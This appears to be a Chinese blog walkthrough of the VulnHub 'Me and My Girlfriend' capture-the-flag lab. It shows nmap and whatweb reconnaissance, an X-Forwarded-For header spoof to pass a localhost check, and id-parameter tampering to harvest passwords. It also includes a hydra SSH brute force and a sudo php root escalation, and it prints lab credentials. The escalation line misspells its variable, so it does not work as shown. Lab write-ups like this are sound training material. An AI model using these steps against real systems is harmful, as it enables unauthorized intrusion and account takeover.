vulnhub Me and My Girlfriend靶场

发布时间 2023-12-20 18:25:39作者: 羲和跃明

1.信息收集

扫描存活主机

sudo arp-scan -l

扫描主机的开放端口

nmap -p- 192.168.42.156

2 (1)

扫描端口具体开放服务

nmap -p 22,80 -A -sV 192.168.42.156

3

扫描网站指纹

whatweb 192.168.42.156

4

2.漏洞挖掘

访问网站

5

F12,查看html

6

burp抓包

添加X-Forwarded-For:127.0.0.1

7

访问成功(因为他要本地访问所以每一个包都要加X-Forwarded-For:127.0.0.1)

开始逛街

8

发现登录框(弱密码不行)

9

register注册一个,发现id=12,改id找找其他的账号密码

18

3.漏洞利用

id=1,找到一个账号,继续

17

找到的账号密码写在两个文件中

19

有了账号密码,有22端口,ssh开始爆破

hydra -L 1.txt -P 2.txt ssh://192.168.42.156:22

20

找到账号

alice

4lic3

登录 ssh alice@192.168.42.156 -p 22

ls -a 查看文件,找到flag1

21

4.提升权限

常规查看

sudo -l

发现该账户有root(php)命令

22

在网站上查找php提权

https://gtfobins.github.io/

23

复制命令,执行命令

CMD="/bin/sh"

sudo php -r "system('$CDM')"

发现root成功

24

得到flag2.txt

cat flag2.txt

25